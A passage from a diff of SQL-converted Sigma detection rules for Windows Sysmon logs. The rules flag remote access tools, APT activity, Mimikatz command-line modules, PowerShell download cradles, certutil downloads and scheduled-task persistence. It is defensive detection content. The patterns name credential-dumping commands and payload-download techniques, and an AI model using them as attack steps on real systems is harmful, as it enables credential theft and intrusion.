comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - 
"attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may 
use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of 
SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", + "status": "test", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "Potential ACTINIUM Persistence Activity", + "id": 
"e1118a8f-82f5-44b3-bb6b-8a284e5df602", "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "status": "experimental", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. 
startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - 
"description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + }, + { + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. 
Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 
'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((OriginalFileName = '3CXDesktopApp.exe' OR Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', 
'59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE 
'\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File 
Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1027" 
@@ -6786,18 +6616,18 @@ "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.resource_development", "attack.t1587.001" 
